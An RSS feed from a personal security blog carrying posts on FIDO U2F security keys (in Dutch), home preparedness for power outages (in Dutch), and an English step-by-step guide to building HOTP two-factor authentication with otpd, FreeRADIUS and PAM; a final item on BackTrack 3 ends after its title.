<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Security on OiePoie!</title>
    <link>https://www.oiepoie.nl/categories/security/</link>
    <description>Recent content in Security on OiePoie!</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sat, 24 Jan 2015 12:26:30 +0100</lastBuildDate><atom:link href="https://www.oiepoie.nl/categories/security/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Veilig inloggen dankzij Fido U2F</title>
      <link>https://www.oiepoie.nl/2015/01/24/veilig-inloggen-met-fido/</link>
      <pubDate>Sat, 24 Jan 2015 12:26:30 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2015/01/24/veilig-inloggen-met-fido/</guid>
      <description>&lt;h2&gt;Faillissement&lt;/h2&gt;
&lt;p&gt;2014 was voor mij het jaar van het faillissement van username/password authenticatie. Zoals altijd lekten er honderduizenden wachtwoorden uit, maar ook testen met phishing toonden aan dat ongeveer een kwart van de mensen hier in trapt.&lt;br/&gt;
Aan de andere kant krijgen we steeds meer accounts op websites, steeds vaker gaan we bestellen bij webwinkels, je bestaat niet als je niet meedoet aan allerlei social media platformen, enzovoorts. Ik gebruik zelf &lt;a class=&#34;extlink&#34; href=&#34;https://lastpass.com/&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;LastPass&#34;&gt;LastPass&lt;/a&gt; (aanrader!) als hulpmiddel om al die wachtwoorden te managen en daar zitten nu al ruim 200 accounts in. Zonder zo’n password manager betekent dat dus dat je een paar wachtwoorden hebt die je op tientallen websites gebruikt. Maar als dat wachtwoord dan op straat komt te liggen, ligt ook de toegang tot al die websites in één keer open (niet goed!).&lt;/p&gt;
&lt;h2&gt;één of twee factoren?&lt;/h2&gt;
&lt;p&gt;De(?) oplossing voor veilig inloggen ligt in het gebruik van zogenaamde 2-factor authenticatie. Dat betekent over het algemeen dat je niet alleen inlogt met iets wat alleen jij weet (je wachtwoord), maar daarbij ook nog iets wat alleen jij hebt. Als dan je wachtwoord wordt gehackt kan daar nog steeds niet mee ingelogd worden omdat ze niet dat “ding” hebben wat ook nodig is om in te loggen. Omgekeerd geldt dat ook, mijn “ding” zit aan mijn sleutelbos. Als ik die verlies dan kunnen ze nog steeds niet als mij inloggen want ze weten mijn wachtwoord niet.&lt;br/&gt;
Die tweede factor kan ook biometrie zijn, dus een vingerafdruk zijn of een scan van je iris (die mooie kleuren in je oog), maar daar gaan we het nu niet over hebben.&lt;/p&gt;
&lt;h2&gt;Het Ding&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/google-authenticator.jpeg&#34;&gt;&lt;img alt=&#34;google-authenticator&#34; class=&#34;alignright size-medium wp-image-357&#34; height=&#34;300&#34; sizes=&#34;(max-width: 169px) 85vw, 169px&#34; src=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/google-authenticator-169x300.jpeg&#34; srcset=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/google-authenticator-169x300.jpeg 169w, https://www.oiepoie.nl/wp-content/uploads/2015/01/google-authenticator.jpeg 322w&#34; width=&#34;169&#34;/&gt;&lt;/a&gt; Goed, we hebben iets nodig wat niemand anders heeft. Dat kan bijvoorbeeld een app op je smartphone zijn die iedere minuut een andere code maakt. De gratis app &lt;a class=&#34;extlink&#34; href=&#34;https://support.google.com/accounts/answer/1066447?hl=nl&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;Google Authenticator&#34;&gt;Google Authenticator&lt;/a&gt; is hier een voorbeeld van. Het maakt iedere minuut een andere code aan en die type je dan over als extra wachtwoord. Een andere optie met je smartphone is via SMS, je logt ergens in met username &amp;amp; password en krijgt dan via SMS de extra code die je nog moet ingeven om het inloggen te voltooien.&lt;br/&gt;
Dit zijn beide methodes die veiliger zijn dan alleen inloggen met je wachtwoord.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Vasco-tokens_p.jpg&#34;&gt;&lt;img alt=&#34;Vasco Go3 tokens&#34; class=&#34;alignleft size-medium wp-image-363&#34; height=&#34;225&#34; sizes=&#34;(max-width: 300px) 85vw, 300px&#34; src=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Vasco-tokens_p-300x225.jpg&#34; srcset=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Vasco-tokens_p-300x225.jpg 300w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Vasco-tokens_p-1024x768.jpg 1024w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Vasco-tokens_p-630x473.jpg 630w&#34; width=&#34;300&#34;/&gt;&lt;/a&gt;Een andere optie is met een “ding” of in vaktaal een “token”. Dit was tot voor kort kostbaar en niet gestandaardiseerd. Ieder bedrijf koos voor een ander token en je moest die dingen uitdelen en er ook voor zorgen dat ze weer terug kwamen, want ze waren veel geld waard. Sinds kort zijn een aantal grote Internet bedrijven bij elkaar gekomen om een universeel token te bedenken. Het idee is dat je als consument één keer zo’n token koopt of krijgt en daar vervolgens op veel sites gebruik van kan maken. Dat is de &lt;strong&gt;Fido Alliance&lt;/strong&gt;. Het Fido token is een soort USB memory stick die je op de bekende manier in de computer schuift en die een voor jou unieke code aanmaakt. Voordeel is al dat je die code niet over hoeft te typen en alle computers hebben tegenwoordig wel USB. Er zijn er twee op de markt, eentje van &lt;a class=&#34;extlink&#34; href=&#34;https://www.yubico.com/products/yubikey-hardware/fido-u2f-security-key/&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;Yubico&#34;&gt;Yubico&lt;/a&gt; en eentje van &lt;a class=&#34;extlink&#34; href=&#34;http://sk.plug-up.com/&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;Plug-Up&#34;&gt;Plug-Up&lt;/a&gt;. Die van Yubico is wat duurder, maar wel steviger en er zit een soort tiptoets op. De security key van Plug-Up komt als creditcard binnen en daar moet je nog een flapje ombuigen om ‘m geschikt te maken voor gebruik in USB. De Plug-Up key is wel erg goedkoop, als je hem bij &lt;a class=&#34;extlink&#34; href=&#34;http://www.amazon.de/dp/B00OGPO3ZS&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;Amazon.de&#34;&gt;Amazon in Duitsland&lt;/a&gt; besteld ligt hij een tijdje later voor 8 euro in je bus. De Yubico key kost inclusief verzendkosten 20,50 euro bij &lt;a class=&#34;extlink&#34; href=&#34;http://www.amazon.de/gp/product/B00NLKA0D8&#34; rel=&#34;noopener&#34; target=&#34;_blank&#34; title=&#34;Amazon.de&#34;&gt;Amazon&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p.jpg&#34;&gt;&lt;img alt=&#34;Fido-keys-back_p&#34; class=&#34;alignright size-medium wp-image-354&#34; height=&#34;300&#34; sizes=&#34;(max-width: 300px) 85vw, 300px&#34; src=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p-300x300.jpg&#34; srcset=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p-300x300.jpg 300w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p-150x150.jpg 150w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p-1024x1024.jpg 1024w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Fido-keys-back_p-630x630.jpg 630w&#34; width=&#34;300&#34;/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Werking&lt;/h2&gt;
&lt;p&gt;Op dit moment werken deze twee keys alleen nog maar in Google Chrome en kan je ze gebruiken om bijvoorbeeld je Google mail account extra mee te beschermen. Dat is een goed idee, want behalve dat het je mail beschermt is dat email adres waarschijnlijk ook ingesteld bij andere accounts die je hebt om daar je wachtwoord te herstellen als je het vergeten bent.&lt;br/&gt;
Als je ingelogd bent in Google kan je onder je account instellingen 2-step authentication aanzetten. Op de &lt;a class=&#34;extlink&#34; href=&#34;https://www.yubico.com/products/yubikey-hardware/fido-u2f-security-key/&#34; title=&#34;Yubico pagina&#34;&gt;Yubico pagina&lt;/a&gt; staat een filmpje dat je in anderhalve minuut laat zien hoe dat moet. Daarna krijg je bij het inloggen op google voortaan na het invoeren van username en wachtwoord een scherm dat vraag om de 2e stap met je secure key te voltooien.&lt;br/&gt;
&lt;a href=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Google-2-step.png&#34;&gt;&lt;img alt=&#34;Google-2-step&#34; class=&#34;alignright size-medium wp-image-360&#34; height=&#34;300&#34; sizes=&#34;(max-width: 204px) 85vw, 204px&#34; src=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Google-2-step-204x300.png&#34; srcset=&#34;https://www.oiepoie.nl/wp-content/uploads/2015/01/Google-2-step-204x300.png 204w, https://www.oiepoie.nl/wp-content/uploads/2015/01/Google-2-step.png 454w&#34; width=&#34;204&#34;/&gt;Google twee stap authenticatie&lt;/a&gt;. Het werkt bijna hetzelfde voor beide keys, bij de Yubikey moet je de tiptoets nog aanraken, bij de Plug-up key is dit niet nodig.&lt;br/&gt;
Dus een investering van 8 euro en een paar minuten van je tijd en daarmee kan je een stuk veiliger het Internet op.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Stay Safe &amp;amp; have fun!&lt;/b&gt;&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Business continuity voor thuis</title>
      <link>https://www.oiepoie.nl/2010/05/09/business-continuity-voor-thuis/</link>
      <pubDate>Sun, 09 May 2010 16:41:24 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2010/05/09/business-continuity-voor-thuis/</guid>
      <description>&lt;p&gt;Januari 2010 was er een grote stroomstoring in de bollenstreek waar ik woon: &lt;a class=&#34;extlink&#34; href=&#34;http://www.nu.nl/binnenland/2159025/stroomstoring-bollenstreek-vier-uur-voorbij.html&#34;&gt;stroomstoring bollenstreek na 4 uur voorbij&lt;/a&gt;. Het hele dorp was donker en thuis was ook alle elektriciteit weg. Door de uitval van de elektriciteit werkt ook de verwarming niet, vaste telefonie deed het niet (ik heb internet telefonie van Ziggo), TV en Internet was niet beschikbaar, maar ook mobiele telefonie (in ieder geval het netwerk van KPN) was uitgevallen.&lt;/p&gt;
&lt;p&gt;Nu hebben we wel een voorraad waxinelichtjes in huis en zijn we ook de gelukkige bezitters van een open haard, dus licht en warmte was snel geregeld. Een transistor radio was er ook, maar natuurlijk waren de batterijen leeg. Gelukkig zijn er altijd genoeg reserve batterijen in huis vanwege alle gadgets die daarvan afhankelijk zijn. Helaas hadden we de frequentie van de regionale zender niet op de radio geplakt, dus die konden we niet vinden.&lt;br/&gt;
Wat namelijk je eerste behoefte is bij  zo’n incident, is informatie.&lt;br/&gt;
Wat is er gebeurd, hoe groot is het gebied dat getroffen is, hoe lang gaat het duren.&lt;br/&gt;
&lt;img align=&#34;right&#34; alt=&#34;waxine lichtjes&#34; border=&#34;0&#34; src=&#34;https://www.oiepoie.nl/pics/waxine.jpg&#34;/&gt;De normale informatiebronnen (TV en Internet) werken niet meer, je kan niet terugvallen op telefoneren en dan blijft er nog maar weinig over behalve dat transistor radiootje. Als je trouwens geen transistor radio in huis hebt (en een nieuwe set batterijen erbij) dan is de autoradio natuurlijk ook een erg goede optie. Maar zorg wel dat je de frequentie van de regionale omroep bij de hand hebt. Het beste is eigenlijk een lijstje met alle frequenties van de regionale omroepen plastificeren en bewaren in je auto, dan heb je er ook wat aan als je eens een midweekje in een huisje op de hei zit.&lt;/p&gt;
&lt;p&gt;Communicatie kan nog een grotere behoefte zijn dan informatie. Een van die handige kaarsjes die je aan hebt gestoken kan het huis in lichterlaaie zetten en dan is het toch handig als je de brandweer kan bellen (maar zorg zelf altijd voor blusmiddelen om zelf een beginnende brand de baas te kunnen worden, een poederblusser en een blusdeken kosten niets en kunnen een ramp voorkomen en zorg dat je weet hoe deze middelen te gebruiken). Of je struikelt in het donker en valt van de trap, hoe gaan we nu een ambulance bellen?&lt;br/&gt;
In dit specifieke geval was het incident opgeschaald naar “GRIP 4”, dit is het maximale niveau en betekent onder andere, politieburo, brandweerkazerne en gemeentehuis worden bemand. Politieauto’s rijden met zwaailicht aan langzaam door de straten zodat ze aangesproken kunnen worden voor hulpvragen.&lt;br/&gt;
Het enige wat ik nog kan verzinnen is 2 gsm’s van verschillende providers, bv. KPN en Vodafone (let op hiermee, KPN heeft een hoop providers opgekocht en die draaien nu allemaal op hetzelfde KPN netwerk). Als je samenwoont kan het dus handig zijn als je huisgenoten abonnementen afsluiten bij een andere provider, dan heb je dit makkelijk geregeld. Wat weer wel handig is, is als je gsm ook opgeladen is, is hij nl. bijna leeg dan is je enige kans dat je een autolader hebt (en je auto niet net toevallig bij de dealer staat voor de APK).&lt;/p&gt;
&lt;p&gt;Als het allemaal te lang duurt en je gaat alvast naar bed voordat de spanning weer terug is, of je stapt in de auto om maar bij vrienden te gaan logeren die niet getroffen zijn door de outage, dan kan het handig zijn om van een aantal apparaten de stekker uit het stopcontact te trekken. Dit heeft twee redenen, ten eerste kunnen bij het inschakelen van de spanning door het energiebedrijf pieken op het net ontstaan die mogelijk je apparatuur kunnen beschadigen. Ten tweede hebben veel apparaten tegenwoordig elektronische aan/uit schakelaars en volumeregelaars. Bij mij knalde de wekkerradio aan op vol vermogen toen de spanning terugkwam. Apparaten met elektronische schakelaars herken je aan de tiptoetsen om ze aan/uit te zetten en tiptoetsen of wieltjes zonder einde voor volume regeling.&lt;/p&gt;
&lt;p&gt;Samengevat, &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;be prepared&lt;/li&gt;
&lt;li&gt;zorg voor redundantie&lt;/li&gt;
&lt;li&gt;oefen eens een keer (bv. hoofdschakelaar uitzetten&lt;/li&gt;
&lt;li&gt;plan for the worst (bv. tegelijkertijd geen stroom en geen water)&lt;/li&gt;
&lt;/ul&gt;
</description>
    </item>
    
    <item>
      <title>Free strong (two factor) authentication using One Time Passwords on your mobile phone</title>
      <link>https://www.oiepoie.nl/2008/05/02/free-strong-two-factor-authentication-using-one-time-passwords-on-your-mobile-phone/</link>
      <pubDate>Fri, 02 May 2008 00:18:44 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2008/05/02/free-strong-two-factor-authentication-using-one-time-passwords-on-your-mobile-phone/</guid>
      <description>&lt;p&gt;Authentication is the process by which you verify that someone is who they claim they are. In computerland this mostly involves a secret. By using the secret (for instance a password) in the authentication process Alice (there she is again) proves to Bob that she really is Alice since the secret is coupled to her (digital) identity. This process is as old as the road to Rome.&lt;br/&gt;
But not all secrets are as secret as we would like them to be. If i choose the name of my girlfriend as the secret, it might be easily guessed, even by someone who doesn’t know me, but is willing to go through the effort of making a few phone calls. Also secrets can be captured in transit, through shouldersurfing when you log in to the system, etcetera.&lt;/p&gt;
&lt;p&gt;The next step in this game is &lt;b&gt;strong authentication&lt;/b&gt; a.k.a. &lt;b&gt;two factor authentication&lt;/b&gt;, this is where you combine two out of the next three options to prove your identity:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;something you know (e.g. password, pin)&lt;/li&gt;
&lt;li&gt;something you have (e.g. token, smartcard, cellphone)&lt;/li&gt;
&lt;li&gt;something you are (e.g. fingerprint, iris pattern, DNA, voice)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So apart from capturing someones secret, Eve also has to steal the token/smartcard/cellphone or in case of biometrics duplicate your fingerprint/iris in a way the scanner is convinced that it’s still attached to a human being. This doesn’t make it impossible to authenticate as somebody else, it just makes it harder.&lt;/p&gt;
&lt;p&gt;One of the problems with strong authentication is that it is expensive. You can get (for instance) an RSA token on a trade fair for free, but when you actually want to use one you have to buy the token and also buy the license for the authentication server that is needed to make it work, this may set you back between $50 – $100 per user.&lt;/p&gt;
&lt;p&gt;Another disadvantage is the the cryptographic algorithm used to produce to codes is know only to the company, so you can’t use the RSA token and verify the authentication process to a authentication server of a different vendor. Also nobody can check if the cryptographic principles on with the product is build are sound. Good cryptography is build on open source so anyone can verify the correctness of it’s operation.&lt;br/&gt;
Luckily for us there is the Open Authentication Framework (&lt;b&gt;OATH&lt;/b&gt;) which led to the definition of the “Hashed Message Authentication Code One Time Password” or &lt;b&gt;HMAC OTP&lt;/b&gt; or even more concise &lt;b&gt;HOTP&lt;/b&gt;. If you are interested you can read &lt;a class=&#34;extlink&#34; href=&#34;http://tools.ietf.org/html/rfc4226&#34; target=&#34;_blank&#34;&gt;rfc4226&lt;/a&gt; on it’s inner working’s and even build your own implementation.&lt;/p&gt;
&lt;p&gt;The next step is to build our own strong authentication system using &lt;b&gt;HOTP&lt;/b&gt;. &lt;a class=&#34;extlink&#34; href=&#34;http://www.tri-dsystems.com&#34; target=&#34;_blank&#34;&gt;Tri-D systems&lt;/a&gt; has an open source One Time Password authentication server available for download. They also sell the tokens to use for authentication, but since we are talking open source HOTP we can look for a company which sells the authentication server and has a (soft) token for free: &lt;a class=&#34;extlink&#34; href=&#34;http://www.dsssasia.com/&#34; target=&#34;_blank&#34;&gt;Data Security Systems Solutions&lt;/a&gt;. They provide a free &lt;i&gt;Java Phone Token&lt;/i&gt; which can generate the One Time Passwords.&lt;/p&gt;
&lt;center&gt;&lt;/center&gt;
&lt;p&gt;&lt;b&gt;Build Process&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;goto: &lt;a class=&#34;extlink&#34; href=&#34;http://www.tri-dsystems.com/software/downloads.html&#34; target=&#34;_blank&#34;&gt;http://www.tri-dsystems.com/software/downloads.html&lt;/a&gt;&lt;br/&gt;
accept license and download otpd-3.1.0.tar.gz &amp;amp; pam_otp_auth-3.2.2.tar.gz&lt;/p&gt;
&lt;pre&gt;
gtar zxvf otpd-3.1.0.tar.gz
cd otpd-3.1.0/
./configure
make
make install
&lt;p&gt;mkdir /etc/otpstate
touch /etc/otppasswd
chmod 600 /etc/otppasswd
chmod 700 /etc/otpstate
mkdir /var/run/otpd
touch /var/run/otpd/socket
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;install oathdsss on your Nokia or Windows Mobile phone&lt;br/&gt;
from: &lt;a class=&#34;extlink&#34; href=&#34;http://www.dsssasia.com/token.html&#34; target=&#34;_blank&#34;&gt;http://www.dsssasia.com/token.html&lt;/a&gt;&lt;br/&gt;
and start the program&lt;/p&gt;
&lt;p&gt;First time initialization asks for a label, e.g. SEC&lt;br/&gt;
a seed length between 16 … 20 (choose 20)&lt;br/&gt;
OTP Length between 6 … 8 (choose 6)&lt;/p&gt;
&lt;p&gt;Select Options -&amp;gt; Init&lt;br/&gt;
and register the seed displayed:&lt;br/&gt;
e.g. 44D060008BF440A2F9FF588AAD537F78B820F200&lt;br/&gt;
Now copy the seed to your computer, don’t make any mistakes or it won’t work.&lt;br/&gt;
The seed is case insensitive since it’s a hexadecimal number. If you are using a Windows Mobile device, you might have to switch it to landscape to see all the characters, you should see a left and right square bracket.&lt;/p&gt;
&lt;p&gt;Do you want to set a PIN to protect the OTP?&lt;br/&gt;
Yes (otherwise it wouldn’t be two factor authentication)&lt;br/&gt;
Pin: ****&lt;br/&gt;
Pin Again: ****&lt;/p&gt;
&lt;p&gt;If all goes well oathdsss finishes and when you start it&lt;br/&gt;
up again, you will be asked for a PIN and after that the&lt;br/&gt;
6 number OTP is displayed together with a countdown timer&lt;br/&gt;
running from 60 seconds.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Setting up the OTP server&lt;/b&gt;&lt;br/&gt;
Enter the generated seed from your cellphone into &lt;b&gt;/etc/otppasswd&lt;/b&gt;&lt;/p&gt;
&lt;pre&gt;
cat &amp;gt;&amp;gt; /etc/otppasswd
foo:hotp-d6:44D060008BF440A2F9FF588AAD537F78B820F200
&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;foo&lt;/b&gt; is the username, alter it at your convenience&lt;br/&gt;
&lt;b&gt;hotp-d6&lt;/b&gt; is the token algorithm, so HOTP with a 6 digit OTP.&lt;/p&gt;
&lt;p&gt;Generate two OTP’s from your cellphone and use them with resynctool (this is installed together with the OTP server) to save the state information which the OTP server will need in the authentication process:&lt;/p&gt;
&lt;pre&gt;
resynctool -1 816857 -2 433761 -u foo -k 44D060008BF440A2F9FF588AAD537F78B820F200 &amp;gt; /etc/otpstate/foo
&lt;/pre&gt;
&lt;p&gt;If you look at the contents of &lt;b&gt;/etc/otpstate/foo&lt;/b&gt; you should see something like:&lt;/p&gt;
&lt;pre&gt;
5:foo:0000000000000003:::0:0:0:
&lt;/pre&gt;
&lt;p&gt;Due to a bug (i assume) resynctool is not able to work with 7 or 8 figure OTP’s (it will present you with the error message: &lt;b&gt;resynctool: passcode 1 wrong length&lt;/b&gt;). There is also a second bug (maybe we should call it an discrepancy). While resynctool writes: 0000000000000003 meaning the first two OTP’s have been used and the next to be presented is number 3, the otp server reads that 0000000000000003 as: the first three OTP’s have been used and the next to be presented is number 4. So change the number back to 0000000000000002 or generate an OTP from you cellphone and don’t use it.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Testing authentication&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;start up otpd as root in debug mode:&lt;/p&gt;
&lt;pre&gt;
# otpd -D
otpd: otpd 3.1.0 starting
otpd: accept_thread: tid=3086179248
&lt;/pre&gt;
&lt;p&gt;Now generate an OTP from your phone and test it with:&lt;/p&gt;
&lt;pre&gt;
# otpauth -u foo -p 549855 -s /var/run/otpd/socket
0 (ok)
&lt;/pre&gt;
&lt;p&gt;On the otp server you will see:&lt;/p&gt;
&lt;pre&gt;
otpd: accept_thread: plugin accept fd=5
otpd: work_thread: tid=3076053936, fd=5
otpd: work_thread(3076053936,5): handling plugin request for [foo]
otpd: verify: [foo], sync challenge t:0 e:0 0000000000000004, expecting response 549855
otpd: verify: user [foo] authentication succeeded
otpd: work_thread(3076053936,5): plugin disconnect
&lt;/pre&gt;
&lt;p&gt;If you don’t see a &lt;b&gt;0 (ok)&lt;/b&gt; from otpauth, you might get a &lt;b&gt;3 (authentication error)&lt;/b&gt; which means you didn’t present the expected OTP to the server. In the server debug window you will see 5 OTP’s (configurable through /etc/otpd.conf) which the server expects from that user account. Generate another one from you phone an you will immediately see if that one is in the list and will work.&lt;br/&gt;
If you get a &lt;b&gt;5 (service error)&lt;/b&gt; there is something wrong with your configuration and you have to fix that first before authentication will work.&lt;/p&gt;
&lt;p&gt;You might want to play around a little bit more with the HOTP software to get a grip on how it’s working. An easier way to generate the OTP’s is through a small perl program on your computer. For this you have to install the &lt;b&gt;Authen::HOTP&lt;/b&gt; module:&lt;/p&gt;
&lt;pre&gt;
perl -MCPAN -e &#39;install Authen::HOTP&#39;
&lt;/pre&gt;
&lt;p&gt;And then create this program:&lt;br/&gt;
[perl]&lt;br/&gt;
#!/usr/bin/perl&lt;br/&gt;
use Authen::HOTP qw(hotp);&lt;br/&gt;
use strict;&lt;/p&gt;
&lt;p&gt;my $secret=”44D060008BF440A2F9FF588AAD537F78B820F200″;&lt;br/&gt;
my $counter=$ARGV[1];&lt;br/&gt;
my $digits=$ARGV[0];&lt;/p&gt;
&lt;p&gt;my $pass = hotp($secret, $counter, $digits);&lt;br/&gt;
print “$pass\n”;&lt;br/&gt;
[/perl]&lt;/p&gt;
&lt;p&gt;Now it’s a easy as:&lt;/p&gt;
&lt;pre&gt;
# ./hotp.pl 6 5
853481
&lt;/pre&gt;
&lt;p&gt;If you got a successful authentication we can proceed to doing something useful with HOTP. Tri-D delivers a pam-otp module which you can use on a local system to replace your standard username/password authentication dialog. But they really recommend using the OTP daemon through RADIUS.&lt;br/&gt;
So download freeradius and compile &amp;amp; install:&lt;/p&gt;
&lt;pre&gt;
cd /tmp
wget ftp://ftp.freeradius.org/pub/radius/freeradius-1.1.7.tar.bz2
gtar jxvf freeradius-1.1.7.tar.bz2
cd freeradius-1.1.7
./configure
make
make install
&lt;p&gt;cd redhat/
cat rc.radiusd-redhat &amp;gt; /etc/init.d/radiusd
chkconfig &amp;ndash;add radiusd
chkconfig &amp;ndash;list radiusd
radiusd         0:off   1:off   2:off   3:off   4:off   5:off   6:off
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;On my redhat system i had to modify &lt;b&gt;/etc/init.d/radiusd&lt;/b&gt; to read:&lt;br/&gt;
&lt;b&gt;RADIUSD=/usr/local/sbin/radiusd&lt;/b&gt;&lt;br/&gt;
and i had to run &lt;b&gt;ldconfig&lt;/b&gt; again or otherwise radiusd would complain about&lt;br/&gt;
a missing &lt;b&gt;libradius-1.1.7.so&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Modify the radius configuration &lt;b&gt;/usr/local/etc/raddb/radiusd.conf&lt;/b&gt; to allow for One Time Passwords:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;remove the comment (#) before: &lt;b&gt;$INCLUDE ${confdir}/otp.conf&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;add &lt;b&gt;otp&lt;/b&gt; directly below &lt;b&gt;authorize {&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;add &lt;b&gt;otp&lt;/b&gt; directly below &lt;b&gt;authenticate {&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And start otpd and the radius service up:&lt;/p&gt;
&lt;pre&gt;
# otpd
# service radiusd start
Starten van RADIUS server:                                 [  OK  ]
&lt;/pre&gt;
&lt;p&gt;Now we can test OTP authentication through RADIUS with the radtest program:&lt;/p&gt;
&lt;pre&gt;
# ./hotp.pl 6 11
885417
&lt;h1 id=&#34;radtest-foo-885417-localhost-10-testing123&#34;&gt;radtest foo 885417 localhost 10 testing123&lt;/h1&gt;
&lt;p&gt;Sending Access-Request of id 197 to 127.0.0.1 port 1812
User-Name = &amp;ldquo;foo&amp;rdquo;
User-Password = &amp;ldquo;885417&amp;rdquo;
NAS-IP-Address = 255.255.255.255
NAS-Port = 10
rad_recv: Access-Accept packet from host 127.0.0.1:1812, id=197, length=20&lt;/p&gt;
&lt;h1 id=&#34;tail--1-varlogmessages&#34;&gt;tail -1 /var/log/messages&lt;/h1&gt;
&lt;p&gt;May  1 23:25:10 vortex otpd[11395]: verify: user [foo] authentication succeeded
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;testing123&lt;/b&gt; is the default RADIUS secret for localhost, you MUST change that in:&lt;br/&gt;
&lt;b&gt;/usr/local/etc/raddb/clients.conf&lt;/b&gt;, the NAS port number (10) is not used.&lt;/p&gt;
&lt;p&gt;On my testbox there was no pam_radius_auth module, so:&lt;/p&gt;
&lt;pre&gt;
cd /tmp
wget ftp://ftp.freeradius.org/pub/radius/pam_radius-1.3.17.tar.gz
gtar zxvf pam_radius-1.3.17.tar.gz
cd pam_radius-1.3.17
make
cp pam_radius_auth.so /lib/security/
cat  pam_radius_auth.conf &amp;gt; /etc/raddb/server
chmod go-rwx /etc/raddb/server
&lt;/pre&gt;
&lt;p&gt;Edit &lt;b&gt;/etc/raddb/server&lt;/b&gt; to match te secret for localhost in &lt;b&gt;/usr/local/etc/raddb/clients.conf&lt;/b&gt;, next add a line in &lt;b&gt;/etc/pam.d/system-auth&lt;/b&gt; like this:&lt;/p&gt;
&lt;pre&gt;
auth        required      /lib/security/$ISA/pam_env.so
auth        sufficient    /lib/security/$ISA/pam_unix.so likeauth nullok
auth        sufficient    /lib/security/pam_radius_auth.so try_first_pass
auth        required      /lib/security/$ISA/pam_deny.so
&lt;/pre&gt;
&lt;p&gt;This will allow normal password authentication, but if you are providing an OTP the unix password authentication will fail and the OTP is passed on to the pam_radius_auth module for validation.&lt;/p&gt;
&lt;p&gt;You can also use OTP authentication on you Apache webserver by using the &lt;a class=&#34;extlink&#34; href=&#34;http://www.freeradius.org/mod_auth_radius/&#34; target=&#34;_blank&#34;&gt;mod_auth_radius&lt;/a&gt; module.&lt;/p&gt;
&lt;p&gt;Have fun!&lt;/p&gt;
&lt;p&gt;&lt;i&gt;sources:&lt;/i&gt;&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://fbq.hamal.nl/index.php/archives/8#more-8&#34; target=&#34;_blank&#34;&gt;Foo Bar Quux&lt;/a&gt;&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://www.tri-dsystems.com/documentation/quickstart.html&#34; target=&#34;_blank&#34;&gt;Tri-D QuickStart Guide&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update 20080529&lt;/b&gt;&lt;br/&gt;
Since it looks like the Tri-D site is offline, i will make my copies of otpd and pam_otp_auth available for download:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.oiepoie.nl/sw/otpd-3.1.0.tar.gz&#34;&gt;otpd-3.1.0.tar.gz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.oiepoie.nl/sw/pam_otp_auth-3.2.2.tar.gz&#34;&gt;pam_otp_auth-3.2.2.tar.gz&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</description>
    </item>
    
    <item>
      <title>BackTrack 3 on a USB stick (ultimate hacker tool on your keychain)</title>
      <link>https://www.oiepoie.nl/2008/03/09/backtrack-3-on-a-usb-stick-ultimate-hacker-tool-on-your-keychain/</link>
      <pubDate>Sun, 09 Mar 2008 15:02:08 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2008/03/09/backtrack-3-on-a-usb-stick-ultimate-hacker-tool-on-your-keychain/</guid>
